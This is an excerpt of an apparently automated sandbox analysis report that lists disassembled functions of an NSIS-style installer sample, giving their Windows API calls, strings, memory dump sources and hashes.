                                          • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                          Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                          • MulDiv.KERNEL32(0001B200,00000064,?), ref: 00403295
                                          • wsprintfW.USER32 ref: 004032A5
                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                          Strings
                                          • verifying installer: %d%%, xrefs: 0040329F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                          • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                          • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                          • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                          Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                          • wsprintfW.USER32 ref: 00404457
                                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s$@rD
                                          • API String ID: 3540041739-1813061909
                                          • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                          • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                          • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                          • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                          Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: *?|<>/":
                                          • API String ID: 589700163-165019052
                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                          • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                          • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                          Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Close$DeleteEnumOpen
                                          • String ID:
                                          • API String ID: 1912718029-0
                                          • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                          • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                          • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                          • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                          Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?), ref: 004020A3
                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                          • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                          • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                          • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                          Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                          • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                          • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                          • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                          Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                          • API String ID: 1697273262-1764544995
                                          • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                          • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                          Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00404902
                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID: $@rD
                                          • API String ID: 3748168415-881980237
                                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                          Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                          • lstrlenW.KERNEL32 ref: 004026B4
                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                          • String ID: CopyFiles "%s"->"%s"
                                          • API String ID: 2577523808-3778932970
                                          • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                          • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                          Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: lstrcatwsprintf
                                          • String ID: %02x%c$...
                                          • API String ID: 3065427908-1057055748
                                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                          Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OleInitialize.OLE32(00000000), ref: 00405057
                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                          • String ID: Section: "%s"$Skipping section: "%s"
                                          • API String ID: 2266616436-4211696005
                                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                          Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(?), ref: 00402100
                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                          • String ID:
                                          • API String ID: 1599320355-0
                                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                          Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                          • String ID: Version
                                          • API String ID: 512980652-315105994
                                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                          Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                          • GetTickCount.KERNEL32 ref: 00403303
                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                          Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
